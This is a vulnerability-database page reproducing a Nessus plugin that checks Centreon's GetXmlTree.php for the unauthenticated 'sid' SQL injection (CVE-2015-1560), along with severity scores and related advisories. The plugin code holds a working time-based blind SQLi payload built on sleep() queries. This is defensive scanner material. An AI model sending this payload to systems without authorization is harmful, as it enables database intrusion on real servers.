Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2016-2024 Tenable Network Security, Inc.CENTREON_GETXMLTREE_SID_SQLI.NASL
HistoryAug 31, 2016 - 12:00 a.m.

Centreon GetXmlTree.php 'sid' Parameter SQLi

2016-08-3100:00:00
This script is Copyright (C) 2016-2024 Tenable Network Security, Inc.
www.tenable.com
17

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

8

Confidence

Low

EPSS

0.003

Percentile

70.6%

JSON

The Centreon application running on the remote host is affected by a SQL injection (SQLi) vulnerability in the isUserAdmin() function due to improper sanitization of user-supplied input to the ‘sid’ parameter of the GetXmlTree.php script. An unauthenticated, remote attacker can exploit this issue, via a specially crafted request, to execute arbitrary SQL statements against the back-end database, resulting in the disclosure or manipulation of arbitrary data.

Note that the application is also reportedly affected by a remote command injection vulnerability; however, Nessus has not tested for this issue.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(93244);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/05/30");

  script_cve_id("CVE-2015-1560");
  script_bugtraq_id(75602);
  script_xref(name:"EDB-ID", value:"37528");

  script_name(english:"Centreon GetXmlTree.php 'sid' Parameter SQLi");

  script_set_attribute(attribute:"synopsis", value:
"A PHP application running on the remote host is affected by a SQL
injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Centreon application running on the remote host is affected by a
SQL injection (SQLi) vulnerability in the isUserAdmin() function due
to improper sanitization of user-supplied input to the 'sid' parameter
of the GetXmlTree.php script. An unauthenticated, remote attacker can
exploit this issue, via a specially crafted request, to execute
arbitrary SQL statements against the back-end database, resulting in
the disclosure or manipulation of arbitrary data.

Note that the application is also reportedly affected by a remote
command injection vulnerability; however, Nessus has not tested for
this issue.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2015/Jul/47");
  script_set_attribute(attribute:"see_also", value:"https://github.com/centreon/centreon/releases?after=2.6.3");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Centreon version 2.6.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/08");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/09/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/08/31");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:centreon:centreon");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:merethis:centreon");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2016-2024 Tenable Network Security, Inc.");

  script_dependencies("centreon_detect.nbin");
  script_require_keys("www/PHP", "installed_sw/Centreon");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "Centreon";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

stimes = make_list(3,5,7);
num_queries = max_index(stimes);

for (i = 0; i < max_index(stimes); i++)
{
  query = 'sleep('+stimes[i]+')';
  exploit = '/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,'+query+
    ',%27%27)%2B%27';

  http_set_read_timeout(stimes[i] + 10);
  then = unixtime();

  res = http_send_recv3(
    method : "GET",
    port   : port,
    item   : dir + exploit,
    exit_on_fail : TRUE
  );

  now = unixtime();
  ttime = now - then;

  time_per_query += 'Query #' + (i+1) + ' : '+query+' -- Sleep Time : ' +
  stimes[i] + ' secs -- Response Time : ' + ttime + ' secs\n';

  overalltime += ttime;
  if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] * 2)) )
  {
    vuln = TRUE;

    output =
      'Blind SQL Injection Results' +
      '\n  Query                      : ' + query +
      '\n  Response time              : ' + ttime + ' secs' +
      '\n  Number of queries executed : ' + num_queries +
      '\n  Total test time            : ' + overalltime + ' secs' +
      '\n  Time per query             : ' +
      '\n'+ "  " + time_per_query;

    continue;
  }
  else
  {
    vuln = FALSE;
    break;
  }
}

if (vuln)
{
  security_report_v4(
    port       : port,
    severity   : SECURITY_HOLE,
    generic    : TRUE,
    sqli       : TRUE,  # Sets SQLInjection KB key
    request    : make_list(install_url + exploit),
    output     : output
  );
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
VendorProductVersionCPE
centreoncentreoncpe:/a:centreon:centreon
merethiscentreoncpe:/a:merethis:centreon

Related

cve 1
prion 1
nvd 1
cvelist 1
exploitpack 1
zdt 1
packetstorm 1
securityvulns 2
openvas 1
exploitdb 1
cve
cve
CVE-2015-1560
2015-07-14 16:59:00
prion
prion
Sql injection
2015-07-14 16:59:00
nvd
nvd
CVE-2015-1560
2015-07-14 16:59:00
cvelist
cvelist
CVE-2015-1560
2015-07-14 16:00:00
exploitpack
exploitpack
Centreon 2.5.4 - Multiple Vulnerabilities
2015-07-08 00:00:00
zdt
zdt
Centreon 2.5.4 - Multiple Vulnerabilities
2015-07-08 00:00:00
packetstorm
packetstorm
Merethis Centreon 2.5.4 SQL Injection / Remote Command Execution
2015-07-08 00:00:00
securityvulns
securityvulns
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
2015-07-14 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-07-14 00:00:00
openvas
openvas
Centreon Multiple Vulnerabilities (Sep 2015)
2015-09-08 00:00:00
exploitdb
exploitdb
Centreon 2.5.4 - Multiple Vulnerabilities
2015-07-08 00:00:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

8

Confidence

Low

EPSS

0.003

Percentile

70.6%

JSON
Related for CENTREON_GETXMLTREE_SID_SQLI.NASL
cve1prion1nvd1cvelist1exploitpack1zdt1packetstorm1securityvulns2openvas1exploitdb1